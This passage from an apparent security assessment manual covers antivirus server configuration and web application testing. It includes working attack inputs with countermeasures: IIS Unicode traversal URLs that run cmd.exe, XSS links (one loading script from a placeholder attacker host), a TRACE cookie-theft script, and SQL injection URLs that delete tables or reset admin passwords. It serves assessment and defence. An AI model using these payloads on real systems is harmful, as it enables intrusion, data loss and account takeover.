e-mail is rare. Outlook Express is more susceptible to viruses because it is the more
common e-mail program, and more viruses are written to attack it or use it to propagate
themselves. Sometimes an Outlook Express user will get a virus in an e-mail message and the
virus will infect his or her computer even though he or she doesn't open the message,
due to a vulnerability in the system.
• Do not pass on hoax viruses
Do not pass on e-mail messages about new viruses asking you to forward the message
to everyone you know. They usually claim to have gotten the information from some
reputable company. Those are almost invariably hoaxes. You should pass them on to the
system administrator instead.
O.7.3 Check NAV Server Configuration Procedures
O.7.3.1 4
O.7.3.2 ANTIVIRUS SERVER CONFIGURATION
• There should be a designated primary Antivirus server. This system will control all
the configuration parameters for the other Antivirus systems at different locations.
• Updates to this server must be made from the appropriate vendor’s official internet
site.
• This server shall check for updates to the virus definitions every 30 minutes. Once
downloaded, the server should also push the updates to the secondary servers.
O.7.3.3 ALERTS CONFIGURATION
• The information on the virus found must be propagated to the primary server.
• This primary server, on finding a unique virus strain with a high severity rating, must
alert the administrator via e-mail, pager or other notification methods about its
presence.
O.7.3.4 CONFIGURING SCAN OPTIONS
• Scan options are the settings Norton Antivirus uses when it scans your computer for
virus-infected files. In most cases, you should set scan options before you run a
scan. You can set up unique configurations for scans performed while you wait and
scans performed during real-time protection. These options include:
O.7.3.5 SELECTING FILE TYPES TO SCAN
• The time to complete a scan can be reduced by limiting the scan to files with
selected extensions. Configure it to scan .EXE, .COM, .DLL and .DOC files. The systems
must be scanned at regular intervals; this is the only way to ensure that the
computer is virus-free.
O.7.3.6 ZIP/COMPRESSED FILE SCANNING
• Scanning of files inside compressed files should be turned on. The scanning host
should be configured to scan at least 3 levels of nested zip files.
O.7.3.7 SELECTING EXCLUSIONS TO THE SCAN
• This should be dealt with on a case-by-case basis depending on the false positives
that are being generated. NAV can be configured either to skip scanning a file or to
skip scanning for a particular virus.
O.7.3.8 SELECTING THE LOCATION OF THE SCAN
• The NAV client must be configured to scan all system drives, excluding read-only
media. The scan must be scheduled to run every day at 12:30 PM.
O.7.3.9 CREATING A NOTIFICATION THAT A VIRUS WAS DETECTED
• All NAV clients must be configured to send notification of the detected virus to
the central server. The notification should give the following details:
• Name of computer
• Name of detected virus
• Full file path and name
• Login name of user
• Type of scan
• Action taken on infection
• Filename (no path)
O.7.3.10 CHOOSING ACTION(S) TO PERFORM ON INFECTED FILES (all types of viruses)
• The NAV clients must be configured to first try to disinfect the virus. On failure of
disinfection, the file must be quarantined or deleted.
O.8 ANTIVIRUS REPORTS
These reports are generated to determine the effectiveness of the antivirus
management strategy. They include information on the viruses found by the
AV system, the hosts they originate from, and the threat that the viruses pose.
These reports are categorized into two types.
O.8.1 Administrator AV Report
This report is for the AV administrator at each location. It gives information on the
following:
1) Top 10 viruses, the number of virus instances found, and each virus’s classification level.
2) Top 10 computers (sorted by number of viruses found).
Refer to the section on "Threat Severity Assessment" for more details.
In addition to the above, the administrator provides the reason for the top 10 virus infections as
input to the management report.
O.8.2 Management AV Report
The management AV report gives senior and middle-level management an overview
of the virus activity within the organization so that further preventive steps can be taken. The
management report details:
1) 5 - 10 unique strains of viruses found in Segress (along with the reason for the
infection).
2) Breakup of the infection at different locations.
O.9 THREAT SEVERITY REVIEW
Please refer to the Risk Assessment section.
P WEB APPLICATION SECURITY ASSESSMENT
P.1 DESCRIPTION
This chapter explains how to assess web applications. As use of the internet increases
day by day, the number of web sites is increasing day by day as well. Many banks,
educational institutes and large corporates are using the web these days to make their work
faster and to keep their clients and employees updated regularly. Because companies have to
allow web traffic in order to use the web applications that fulfil their requirements, it is
essential to have secure web applications.
As per Netcraft’s survey, the number of sites on the internet is now 56,923,737.
P.1.1 What is Web Application Security Assessment?
Web application security covers the security of the web application being used, the web server
running the web application and the modules running on the web server. Attackers normally
prefer to attack the web application, as no firewall blocks requests to the web server.
P.2 PURPOSE
To make the web application and web server as secure as possible, stop them from
disclosing unnecessary information, and make it hard for an attacker to gain access.
P.3 OBJECTIVE
To get access to the remote machine, even bypassing the firewall, and then enumerate
the network; to gather any available credentials from the network and servers.
P.4 EXPECTED RESULT
Corporations normally put in a firewall to secure themselves, but as companies use the web
for their communication and other purposes, the firewall has to allow traffic on port 80,
which is the web server's port.
P.5 METHODOLOGY
P.5.1 Identifying Web Server vendor and version
The first step in a web application assessment is to identify the web server on which the
application is running. To detect the web server, the following methods can be used:
1) Banner grabbing (explained in Section A.5.2)
2) Web server detection using automated tools (explained in Section A.5.3)
3) Default file detection (explained in Section A.5.4)
4) Checking the file extensions on the server (explained in Section A.5.5)
Tools
Netcat, Httprint
Further Reading[s]
http://net-square.com/httprint
P.5.2 Identifying Web Server vendor and version - By Banner Grabbing
Description
To determine the web server manually, check the response header of the server. To
get the response header, send a request using netcat (nc). Send a HEAD request to the
server and the server will return the response header. HEAD is the method used to
get only the response header from the server. In the response there will be one header named
“Server” which specifies the server name. It is also possible that the server administrator has
disabled the HEAD method; in such a case, send a GET request instead and check the header
of the response. In the case of GET, the server returns the response header together with
the content.
Pre-requisite[s]
Examples/Results
C:\>nc www.oissg.org 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Tue, 12 Oct 2004 03:48:49 GMT
Server: Apache
Set-Cookie: sessioncookie=7a322bc75fac0e2792a81978e335c33e; expires=Tue, 12-Oct04 15:48:49 GMT; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 12 Oct 2004 03:48:50 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=iso-8859-1
Analysis/Conclusion/Observation
The above example shows the response header returned by the server. Check the “Server” header in
the response. In the example above, it shows that some flavour of Apache is running. In many
cases the response header will show the server name as well as the version.
Countermeasures
•
Change the server tag in response header.
Tool[s]
•
netcat
Further Reading[s]
Remarks
P.5.3 Identifying Web Server vendor and version - using automated tools
Description
The Server tag in the response header does not always show the correct result. The
admin may have obfuscated it by changing the server banner strings, or by plug-ins
such as mod_security or ServerMask. In such cases it is hard to determine which server is
running. To determine the server name and version, a free automated tool named httprint
can be used. This tool is available on multiple OSes such as Win32,
Linux, BSD and Mac. It uses HTTP fingerprinting to determine the web server:
it sends multiple requests to the server, analyzes the responses and determines the server.
This tool can also be used to identify web-enabled devices.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
HTTPRINT
Further Reading[s]
http://net-square.com/httprint
Remarks
P.5.4 Identifying Web Server vendor and version – By default files
Description
It is normal behaviour for a server to expose a few default directories and pages in a default
installation. There are two methods to check for the default files and directories:
1) Manual
2) Automated tool: a Perl script named whisker can be used to determine the default
pages and directories on the server.
Pre-requisite[s]
Examples/Results
D:/ perl whisker.pl -h 192.168.7.216 -s scan.db -p 80 -W -l cool.html
Analysis/Conclusion/Observation
As the server was not configured properly, it has default directories. Whisker caught it as IIS
5.0, as marked above.
Countermeasures
•
Stop access on default pages of the server.
Tool[s]
•
browser, Whisker
Further Reading[s]
Remarks
P.5.5 Identifying Web Server vendor and version – By determining the extension of web pages on the web server
Description
It is very important to check the extensions of the web pages on the web server. This helps a lot
in determining the web server and the OS on which the web server is running. It is
possible to use any extension, but normally people keep the default extensions. Though
this is not a foolproof solution, it is one way to determine the server.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
My experience suggests the following: .asp pages are normally hosted on IIS, whereas .aspx
and .asmx pages are hosted on IIS 5.1 onwards. A few of them are:
.cfm – ColdFusion
.asp – IIS
.aspx – IIS 5.1 onwards
Countermeasures
Tool[s]
•
Browser
Further Reading[s]
Remarks
It is also possible to host .asp pages on Apache. Moreover, extensions do not mean
anything in the world of Linux, so one cannot make a decision just by analyzing extensions.
P.5.6 Identifying Web Server vendor and version - Identify Web Server directory structure
Description
Once the web server and the modules on it have been detected, the next step is to
determine the directory structure on the server. One can use a crawler like BlackWidow or
WebCopier for this purpose, but it can also be determined manually quite easily by surfing the
pages of the site.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
•
Browser.
Further Reading[s]
Remarks
P.5.7 Identifying Web Server vendor and version (Continue…)
Description
Identifying the web server is not enough. During the assessment we also have to identify the other
modules running on the web server. Sometimes the server is compromised through
a vulnerability in some module running on it.
Pre-requisite[s]
Examples/Results
c:\>nc www.oissg.org 80
HEAD / HTTP/1.0
HTTP/1.1 301 Moved Permanently
Date: Sat, 27 Nov 2004 14:42:18 GMT
Server: Apache/1.3.28 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlmited/1.4 PHP/4.3.2 FrontPage/5.0.2.2634 mod_ssl/2.8.15 OpenSSL/0.9.6b
Location: http://www.oissg.org/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Analysis/Conclusion/Observation
From the above response header, it can be deduced that some version of Apache is
running with modules like PHP, FrontPage and SSL. These modules can be exploited later to get
a shell on the server. It also shows the versions of the modules that are running. The interesting thing
in this response header is that it also shows the OS on which the web server is running.
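As an added example (not part of the ISSAF text or of any tool it names), the following Python code parses HEAD responses like the two shown in P.5.2 and P.5.7 and records which product names, versions and OS comments the Server header discloses, which is exactly what the "change the server tag" countermeasure is meant to remove. The two responses are constructed samples modelled on the page's output; the 405/501 fallback check and the module spelling mod_bwlimited are assumptions.

```python
import re

# Constructed sample responses modelled on the HEAD responses shown in
# sections P.5.2 and P.5.7 (not captured from a live host).
TERSE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Tue, 12 Oct 2004 03:48:49 GMT\r\n"
    "Server: Apache\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html; charset=iso-8859-1\r\n"
    "\r\n"
)
VERBOSE_RESPONSE = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Date: Sat, 27 Nov 2004 14:42:18 GMT\r\n"
    "Server: Apache/1.3.28 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 "
    "mod_bwlimited/1.4 PHP/4.3.2 FrontPage/5.0.2.2634 mod_ssl/2.8.15 OpenSSL/0.9.6b\r\n"
    "Location: http://www.oissg.org/\r\n"
    "Connection: close\r\n"
    "\r\n"
)
# Assumed reply from a server whose administrator has disabled HEAD.
HEAD_DISABLED_RESPONSE = "HTTP/1.1 405 Method Not Allowed\r\nAllow: GET, POST\r\n\r\n"

# Server header grammar: product[/version], optionally followed by (comment).
_PRODUCT = re.compile(r"([A-Za-z0-9_.-]+)(?:/([^\s()]+))?(?:\s*\(([^)]*)\))?")


def build_request(method, host, path="/"):
    """Bytes to send over the netcat-style connection: HEAD first, GET as fallback."""
    return f"{method} {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def parse_headers(raw):
    """Split a raw HTTP response into (status_line, status_code, {name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status_line = lines[0]
    parts = status_line.split()
    code = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()  # last value wins
    return status_line, code, headers


def head_disabled(raw):
    """True when the server refused HEAD, so the assessor should resend as GET."""
    _, code, _ = parse_headers(raw)
    return code in (405, 501)


def server_products(server_value):
    """[(product, version_or_None, comment_or_None), ...] from a Server header value."""
    return [(m.group(1), m.group(2), m.group(3)) for m in _PRODUCT.finditer(server_value)]


def assess_disclosure(raw):
    """Summarise what the Server header gives away: versioned products and OS hint."""
    _, code, headers = parse_headers(raw)
    server = headers.get("server")
    if server is None:
        return {"code": code, "server": None, "versioned": [], "os_hint": None}
    products = server_products(server)
    return {
        "code": code,
        "server": server,
        # Every "name/version" pair is a version the countermeasure should hide.
        "versioned": [f"{name}/{ver}" for name, ver, _ in products if ver],
        # The parenthesised comment ("Unix") is the OS leak noted in P.5.7.
        "os_hint": next((c for _, _, c in products if c), None),
    }
```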
Countermeasures
•
Change the server tag
Tool[s]
•
Netcat
Further Reading[s]
Remarks
P.5.8 Copy web site (Offline)
Description
Copying the whole web site and testing it offline for vulnerabilities is very convenient for
checking various threats, such as searching for a particular keyword, searching for valid e-mail
addresses, external links, etc. Normally, tools are used to copy the web site. Working on an offline
copy helps in many ways, such as fast response and saved bandwidth, and the copy can be used to
check for vulnerabilities/threats.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
HTTTRACK, BlackWidow, WebCopier, wget
Further Reading[s]
Remarks
P.5.9 Test View Source bugs
Once the site is copied, you can go through the source of each page and find
a lot of information. Page source can contain the following information:
1) User names
2) Default password
3) E-mail address
4) Auto redirection information
5) External Links
P.5.9.1 FIND USERNAME BY VIEW SOURCE
Description
View source can be used to find user names and passwords in the source of the web
pages. Many times, for the sake of convenience, developers store their names in the
source in the form of comments. These can be found by viewing the source and searching
for the usernames. One can write a C program or a regex pattern to find them.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
As shown in the example, the user wrote his name to identify the developer of the page. If
this site is oissg.org, then chances are quite good that there is an account called
“hemil” on it.
Countermeasures
•
Never Store username or developer name in comments
Tool[s]
•
Browser, Editor
Further Reading[s]
Remarks
P.5.9.2 FIND DEFAULT PASSWORD BY VIEW SOURCE
Description
Find keywords like "pass" in .html files:
As explained above, the source code may contain default passwords stored in the form
of comments; keywords like pass or passwd can be searched for to get this
information. The keyword "pass" can also be searched for to get information about the
password input field (like its length etc.). One can write a C program or use a regex pattern to
find them.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
In the above point, we got the username because the user mentioned his name. Here he created
a password to test his application and, smartly, did not mention his name next to it. But in a
way he did, as he wrote his name at the end of the page. So now we have both the username and the
password.
Countermeasures
•
Never Store passwords in comments.
Tool[s]
•
Browser, Editor
Further Reading[s]
Remarks
P.5.9.3 FIND EMAIL ADDRESSES
Description
The source of a web page may contain the e-mail addresses of the developers, vendors or
other persons, which can be of great importance. These addresses can be searched for
in the source code of the web page. One can write a C program or use a regex pattern to
find them.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
In the above case, the user's intention was not to expose anything, but he wrote his email address so
that anyone could send him an email about modifications to the page. That gives away
one email address on the site.
Countermeasures
•
Do not write any email addresses in the comments
Tool[s]
•
Browser, Editor
Further Reading[s]
Remarks
P.5.9.4 CHECK HTTP-EQUIV FOR AUTO REDIRECTION
Description
HTTP-EQUIV auto redirection can be checked to get additional information, such as where
the web page is being redirected, as well as various other information, for example:
<META HTTP-EQUIV="REFRESH" CONTENT="120">
- Refresh the page in the browser every 120 seconds.
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
- Don't cache the page in the browser or on a proxy server.
<META HTTP-EQUIV="mailto:yourname@yourserver.com" CONTENT="NO-CACHE">Click here to mail me.
- Can be used to compose mail with an appropriate subject to the site vendor etc.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
Further Reading[s]
Remarks
P.5.9.5 FIND EXTERNAL LINKS
Description
Using the view source option of the browser, external links defined in the
web page can be retrieved. These links can be used further to evaluate the other related
links available in the web page or web site. One needs to search for “href” to find the links.
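As an added example covering P.5.9.1 through P.5.9.5 together (not part of the ISSAF text), the following Python code runs the regex searches those sections describe over a saved page: comments mentioning user names, passwords or developers, e-mail addresses, META refresh redirections and off-site href targets. The page source, the developer name and the partner host are constructed samples, not taken from any real site.

```python
import re
from urllib.parse import urlsplit

# Constructed page source (not from any real site) carrying the kinds of leaks
# sections P.5.9.1 to P.5.9.5 describe: a developer comment with a test password,
# an e-mail address, META refresh redirections and an external link.
SAMPLE_PAGE = """<html><head>
<!-- Developed by hemil, test pass = Summer2004 -->
<meta http-equiv="refresh" content="120">
<meta http-equiv="refresh" content="5; url=http://www.oissg.org/login.asp">
</head><body>
<a href="/about.html">About</a>
<a href="http://partner.example/catalog">Partner</a>
<a href="mailto:webmaster@oissg.org">Contact</a>
<!-- TODO: tidy the footer -->
</body></html>"""

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
KEYWORD_RE = re.compile(r"\b(user(name)?|pass(word|wd)?|pwd|developed by|login)\b", re.I)
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
HREF_RE = re.compile(r"""href\s*=\s*["']?([^"'\s>]+)""", re.I)
REFRESH_RE = re.compile(
    r"""<meta[^>]*http-equiv\s*=\s*["']?refresh["']?[^>]*content\s*=\s*["']?([^"'>]+)""",
    re.I)


def sensitive_comments(source):
    """HTML comments that mention user names, passwords or developers (P.5.9.1, P.5.9.2)."""
    return [c.strip() for c in COMMENT_RE.findall(source) if KEYWORD_RE.search(c)]


def email_addresses(source):
    """Distinct e-mail addresses anywhere in the source, comments included (P.5.9.3)."""
    return sorted(set(EMAIL_RE.findall(source)))


def refresh_redirects(source):
    """(seconds, target_url_or_None) for every META HTTP-EQUIV refresh (P.5.9.4)."""
    found = []
    for content in REFRESH_RE.findall(source):
        delay, _, rest = content.partition(";")
        seconds = int(delay.strip()) if delay.strip().isdigit() else None
        rest = rest.strip()
        url = rest[4:].strip() if rest.lower().startswith("url=") else None
        found.append((seconds, url))
    return found


def external_links(source, site_host):
    """href targets that point off-site; mailto: and relative links are skipped (P.5.9.5)."""
    links = []
    for href in HREF_RE.findall(source):
        parts = urlsplit(href)
        if parts.scheme in ("http", "https") and parts.netloc.lower() != site_host.lower():
            links.append(href)
    return links


def review_source(source, site_host):
    """One report per page, as the assessor would record it under Examples/Results."""
    return {
        "comments": sensitive_comments(source),
        "emails": email_addresses(source),
        "redirects": refresh_redirects(source),
        "external_links": external_links(source, site_host),
    }
```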
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
Browser, Editor
Further Reading[s]
Remarks
P.6 TEST COMMON GATEWAY INTERFACE
P.6.1 Test Common Gateway Interface
Description
This attack is normally known as a CGI attack. Using this attack, the victim can be forced to give
up files and directories with a simple "GET" command, and to execute remote commands that
would disable access controls.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
Further Reading[s]
Remarks
P.7 TEST DIRECTORY TRAVERSAL
P.7.1 Test Directory Traversal
Description
This vulnerability affects all versions of Windows with IIS 5 installed and running, and the
Personal Web Server 4 on Windows 98. It has also been reported that this works on NT 4.
The directory traversal vulnerability focuses on the web service within IIS.
The exploit works by an attacker constructing a URL that causes IIS to navigate to
any desired folder on the same logical drive and access the files in it. This is achieved
by using Unicode character representations of "/" and "\". This allows a user to traverse
the server to any directory on the same logical drive as the web application. In addition,
unauthenticated users can perform delete, modify or execute tasks in those directories.
This is possible because, by default, the attacker runs under the IUSR_machinename account,
which is a default account and a member of the Everyone and Users groups. Using
this method, a remote user with no credentials gets the same access as a user who
could successfully log on. Therefore any file on the same drive as a web-accessible file
that is accessible to these groups can be manipulated.
Pre-requisite[s]
Examples/Results
Http://www.oissg.org/scripts/..%c1%1c.../winnt/system32/cmd.exe?/c+dir
Http://www.oissg.org/scripts/..%c0%2f.../winnt/system32/cmd.exe?/c+dir
Http://www.oissg.org/scripts/..%c0%af.../winnt/system32/cmd.exe?/c+dir
Http://www.oissg.org/scripts/..%c1%9c.../winnt/system32/cmd.exe?/c+dir
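As an added defender-side example (not part of the ISSAF text), the following Python code models the lenient decoding that makes the four encodings above equivalent to "/" or "\" and runs it over constructed IIS-style log lines to flag requests that walk out of the web root. The decoder's handling of 0xC0/0xC1 lead bytes is an assumption about the flawed IIS behaviour, and the log lines and client addresses are constructed.

```python
from urllib.parse import unquote_to_bytes

# Constructed W3C extended log lines (not real traffic); the request paths reuse
# the encodings listed under Examples/Results above.
LOG_LINES = [
    "2004-11-27 14:42:18 10.0.0.5 GET /index.asp - 200",
    "2004-11-27 14:42:19 10.0.0.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200",
    "2004-11-27 14:42:20 10.0.0.7 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir 200",
    "2004-11-27 14:42:21 10.0.0.9 GET /images/logo%20final.gif - 200",
    "2004-11-27 14:42:22 10.0.0.7 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404",
]


def lenient_decode(path):
    """Percent-decode, then decode the bytes the way the flawed IIS decoder is
    modelled here (assumption): a two-byte sequence with lead byte 0xC0 or 0xC1
    is accepted as an overlong encoding of an ASCII character instead of being
    rejected. Returns (decoded_text, overlong_seen)."""
    raw = unquote_to_bytes(path)
    out, overlong, i = [], False, 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            overlong = True
            # %c0%af and %c0%2f -> '/', %c1%9c and %c1%1c -> '\'
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out), overlong


def analyze_path(path):
    """Classify one request path after decoding and slash normalisation."""
    decoded, overlong = lenient_decode(path)
    segments = decoded.replace("\\", "/").split("/")
    return {"decoded": decoded, "overlong": overlong, "traversal": ".." in segments}


def scan_log(lines):
    """(client, path, kind) for every request that decodes to a parent-directory walk."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        client, path = fields[2], fields[4]
        result = analyze_path(path)
        if result["traversal"]:
            kind = "overlong-utf8" if result["overlong"] else "encoded-traversal"
            hits.append((client, path, kind))
    return hits
```

A plain "%2f" traversal is reported separately from the overlong forms, since a correctly patched server rejects the first on its own while the second is the signature of this specific bug.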
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Browser
Further Reading[s]
http://www.infosecwriters.com/texts.php?op=display&id=16#intro
Remarks
P.8 TEST PRODUCT SPECIFIC ISSUES
P.8.1 Test Product Specific Issue
Description
Having already determined the web server on which the web application is running and the
modules running on that web server, we can exploit the web server and modules to get
access to the remote machine.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Patch the web server regularly
Tool[s]
Browser
Further Reading[s]
http://securityfocus.com/bid
Remarks
P.9 CHECK DIRECTORIES WHICH ARE NOT MAPPED IN THE PAGES
P.9.1 Directories which are not mapped in the pages
Description
Many times administrators keep directories named /tmp, /src, /abc, /xyz or /bkup to hold the
source code of the application or for backup purposes, without any link to them from the web
application. It is good to check for those directories. A Perl script named nikto can be used
to check for such directories.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
Nikto
Further Reading[s]
Remarks
P.9.2 Browsable Directories check
Description
A browsable directory is one that shows the list of all files in the directory. If no default page is
set for a directory, many web servers leave the directory browsable. This vulnerability helps
in accessing files which are not linked from the web pages and many times leads to exposing
unnecessary information.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Stop access of all the directories which are not necessary
Tool[s]
•
Browser
Further Reading[s]
Remarks
P.10 TEST INVALIDATED PARAMETERS
P.10.1 Cross Site Scripting
P.10.2 Cross Site Scripting
Description
The core of cross-site scripting is that an attacker causes a legitimate web server to send a
page to a victim's browser that contains malicious script and/or HTML of the attacker’s
choice. The malicious script runs with the privileges of script originating from the legitimate
web server.
Cross site scripting (also known as XSS and CSS) occurs when a web application
gathers malicious data from a user. The data is usually gathered in the form of a hyperlink
which contains malicious content within it. The user will most likely click on this link from
another web site, web board, email, or from an instant message.
How does cross site scripting work?
1) Victim logs into the target site.
Could occur through social engineering by the attacker:
"Log in to your account to get this special offer!!!"
2) Victim then clicks on a URL or visits a web site that includes the malicious code.
3) Victim user’s browser transmits the malicious code to the vulnerable script on the target site
as a web request.
4) Target site reflects the malicious code back to the victim user’s browser in the response
to the request.
5) Malicious code executes within the victim user’s browser under the security context of the
target site.
To launch XSS, the attacker's script must be sent to the victim.
Three ways to send the attacker’s script to the victim:
• Inter-user communication within the target site (i.e., message board, etc.)
• URL provided on a third-party web site (either clicked on by the victim user or
automatically loaded when visiting a malicious web site.)
• URL embedded in an email or newsgroup posting.
Pre-requisite[s]
Examples/Results
Examples of an HTML link that causes the user to send malicious data to another site:
<A HREF="http://CSS-Vulnerable.com/display.asp?Name=<SCRIPT>alert(document.cookie)</SCRIPT>"> Click here </A>
[Malicious script is appended in the URL.]
<A HREF="http://CSS-vulnerable.com/display.asp?Name=<SCRIPT SRC='http://attacker-site/my_bad_script_file'></SCRIPT>"> Click here </A>
Malicious script could be sent in a post:
Hello message board. This is a message. <SCRIPT>malicious code</SCRIPT> This is the end of my message.
Analysis/Conclusion/Observation
Countermeasures
• Input filtering: properly sanitizing user input data.
• Output filtering: filter user data when it is sent back to the user’s browser.
• Use of firewall: use a third-party application firewall, which intercepts XSS before
it reaches the web server and the vulnerable scripts, and blocks it.
• Disable client-side scripting: the best protection is to disable scripting when it
isn’t required.
• Use signed scripting: another solution is to have “signed scripting” such that any
script with an invalid or untrusted signature would not be run automatically.
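As an added example (not part of the ISSAF text), the following Python code shows the first two countermeasures applied to the page's display.asp?Name= link: a reflecting handler that emits the parameter verbatim beside one that encodes it for the HTML body, plus an allow-list input filter. The hostname is the page's placeholder, the handler and the allow-list pattern are assumptions about a hypothetical display page, and the rendering functions stand in for the server-side script.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# The page's example link, using the page's placeholder host (constructed, not live).
ATTACK_URL = "http://CSS-Vulnerable.com/display.asp?Name=<SCRIPT>alert(document.cookie)</SCRIPT>"

# Input filtering: an allow-list for what a display name may contain. This is an
# assumption about the hypothetical display.asp page, not a rule from the text.
NAME_OK = re.compile(r"[A-Za-z][A-Za-z .'-]{0,40}")


def name_param(url):
    """The Name parameter exactly as display.asp would receive it from the query string."""
    return parse_qs(urlsplit(url).query).get("Name", [""])[0]


def render_vulnerable(name):
    """Reflects the parameter verbatim, so the script in the link runs in the victim's browser."""
    return f"<html><body>Hello {name}</body></html>"


def render_hardened(name):
    """Output filtering: encode for the HTML body context before the value is reflected."""
    return f"<html><body>Hello {html.escape(name, quote=True)}</body></html>"


def input_accepted(name):
    """Input filtering: reject anything outside the allow-list before it is stored or used."""
    return NAME_OK.fullmatch(name) is not None


def contains_script(page):
    """Crude check used here only to compare the two renderings."""
    return "<script" in page.lower()
```

Output encoding is the control that actually neutralises the reflected payload; the allow-list is a second layer, since a value rejected at input never reaches the page at all.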
Tool[s]
Further Reading[s]
Remarks
P.10.3 Cross Site Tracing
P.10.4 Cross Site Tracing
Description
• TRACE request method.
“TRACE” is simply used as an input data echo mechanism for the HTTP protocol. This
request is commonly used for debugging and other connection analysis activities.
• HttpOnly cookie option.
HttpOnly is an HTTP cookie option used to inform the browser not to allow scripting
language access to the “document.cookie” object.
• How to gain access to the cookie normally contained in document.cookie while the
HttpOnly option is used.
• A TRACE request is not allowed by the browser when using an HTML form.
• How to initiate a TRACE request using some scripting language, which is not allowed in
HTML.
Generating a TRACE request
Initiating a TRACE request using the XMLHTTP object, for example:
<script type="text/javascript">
<!--
function sendTrace() {
var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
xmlHttp.open("TRACE", "http://foo.bar", false);
xmlHttp.send();
xmlDoc = xmlHttp.responseText;
alert(xmlDoc);
}
//-->
</script>
<INPUT TYPE=BUTTON OnClick="sendTrace();" VALUE="Send Trace Request">
Pre-requisite[s]
• XST-enabled link
• The server must support the TRACE method (which many do).
• The browser should support some kind of scriptable object capable of making an HTTP
request.
• No need for a dynamic HTML page on the target site which redisplays HTML content
unfiltered.
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Disable TRACE method on the web server
Tool[s]
Further Reading[s]
Remarks
P.11 URL MANIPULATION
P.11.1 URL Manipulation
Description
HTML Pages/Forms uses two methods for passing the values between the pages one is
GET & another is POST method.
What is query string?
•
Information Appended after URL using ? Mark.
•
QueryStrings are used for passing the information across the pages.
•
Asp page uses the GET method to pass information as a query string.
•
URL QueryString is easily visible to anybody in address bar
•
Any malicious user can manipulate the URL QueryString easily
•
Any malicious user can see the QueryString
•
Malicious user can modify the QueryString
Using URL manipulation a malicious user
•
can get unauthorised access of user’s accounts
•
can get master access of the database
•
can manipulate the database contents
•
even can delete the database tables
Database Manipulation:
An attacker can manipulate the URL parameter’s name to identify database fields:
http://www.yoursite.com/phones/phonelist.cgi?phoneid=34
Attacker manipulates the URL by adding the DELETE command:
http://www.yoursite.com/phones/phonelist.cgi?phoneid=34; delete from phones
Request is transferred from app to database and executes the following SQL:
Page 748 of 1123
SELECT name, phone FROM phones WHERE phoneid=34; DELETE FROM phones
When information is passed between pages using the GET method it is appended to the URL; the appended part is the query string. Anybody can therefore see the information that passes between pages, and can modify it in the URL before it is submitted to the server.
Applications often validate fields (size, data type) only on the client side, typically in JavaScript or VBScript. A local proxy such as Achilles can be used to modify the request after the browser has validated it and before it reaches the server.
Browser plug-ins are also available to inspect and edit the request between client and server; one example is LiveHTTPHeaders for Mozilla.
A form may contain various fields (text boxes, check boxes, hidden fields etc.) whose values are passed to other pages. When the form uses the GET method, all the values are appended to the URL after the "?" as name-value pairs, one for each form field.
Uses of the URL query string:
• To pass authentication information
• To manage the session
• To pass the values of the various form fields
Web applications require authentication before a user can log in to the web site, so information such as the user name and password must be passed for authentication. Any of the following HTTP authentication methods can be used:
1) Basic
2) NTLM
3) Digest
Pre-requisite[s]
Examples/Results
• Example: Changing SQL values
– The change-password page builds the following statement from the request parameters:
UPDATE usertable SET pwd='$INPUT[pwd]' WHERE uid='$INPUT[uid]';
– Normal input: http://www.victim.com/cpwd?opwd=y&pwd=x&uid=testuser
– Malicious input: http://www.victim.com/cpwd?opwd=y&pwd=x&uid=testuser'+or+uid+like'%25admin%25'
– In URL encoding %25 = % and + = space, so the statement executed becomes:
UPDATE usertable SET pwd='x' WHERE uid='testuser' or uid like '%admin%';
– Result: the administrator's password is changed to x as well.
